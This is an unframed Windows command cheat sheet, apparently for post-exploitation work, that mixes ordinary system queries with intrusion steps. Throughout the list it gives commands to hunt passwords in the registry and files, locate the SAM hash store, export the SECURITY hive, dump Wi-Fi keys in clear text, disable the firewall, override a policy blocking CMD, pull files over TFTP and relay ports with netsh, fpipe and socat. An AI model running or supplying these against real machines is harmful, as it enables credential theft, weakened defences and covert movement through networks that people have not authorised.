Callable methods
wmic [alias] call /?
Processes
wmic process list full
Startup programs (WMIC)
wmic startup
Services (WMIC)
wmic service
Domain information
wmic ntdomain list
List all patches
wmic qfe
Logical partitions
wmic logicaldisk get description,name
Query processor data width (32-bit or 64-bit)
wmic cpu get DataWidth /format:list
DNS Host
C:\Windows\System32\drivers\etc\hosts
Network Settings
C:\Windows\System32\drivers\etc\networks
Password Hashes of Local Users
C:\Windows\System32\config\SAM
Application Logs
C:\Windows\system32\config\AppEvent.Evt
Security Logs
C:\Windows\System32\config\SecEvent.Evt
Startup folder (programs launched automatically at logon)
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\
Operating system version
ver
Services
sc query state= all
Running processes and the services they host
tasklist /svc
All processes and loaded DLLs
tasklist /m
Remote process list
tasklist /S ip /v
Force a process to terminate
taskkill /PID pid /F
Remote system information
systeminfo /S ip /U domain\user /P Pwd
Remote registry query
reg query \\ip\RegDomain\Key /v
Searching for passwords in the registry
reg query HKLM /f password /t REG_SZ /s
List drives
fsutil fsinfo drives
Search for all Excel files
dir /a /s /b c:\*.xls
Search for all patches
dir /a /b c:\windows\kb*
Searching for passwords in files
findstr /si password *.txt *.xml *.xls
Directory tree of C: saved to a file
tree /F /A c:\ > tree.txt
Export the SECURITY hive to a file
reg save HKLM\Security security.hive
Current user account
echo %USERNAME%
IP information
ipconfig /all
Local DNS cache
ipconfig /displaydns
Open connections
netstat -ano
Netstat loop (refresh every second)
netstat -anop tcp 1
Listening ports
netstat -an | findstr LISTENING
Routing table
route print
ARP table
arp -a
DNS zone listing (interactive nslookup session)
nslookup
set type=any
ls -d domain
Domain SRV lookup
nslookup -type=SRV _www._tcp.url.com
TFTP file download
tftp -i ip GET remotefile
Wireless profiles
netsh wlan show profiles
Firewall disable (legacy netsh firewall syntax)
netsh firewall set opmode disable
Extract wifi passwords in clear text
netsh wlan export profile folder=. key=clear
List Interfaces
netsh interface ip show interfaces
Change IP
netsh interface ip set address local static ip nmask gw ID
Change DNS server
netsh interface ip set dns local static ip
Set the interface to DHCP
netsh interface ip set address local dhcp
Lock the workstation
rundll32.exe user32.dll,LockWorkStation
Firewall disable (advfirewall)
netsh advfirewall set currentprofile state off
Port forwarding
netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2
Enable CMD (clear the DisableCMD policy)
reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f
List available properties
wmic [alias] get /?
Forward local port 4444 to port 80 on the remote host
fpipe.exe -l 4444 -r 80 x.x.x.x
Listen on local port 4444 and relay to port 80 on the remote host with socat
socat TCP4-LISTEN:4444 TCP4:x.x.x.x:80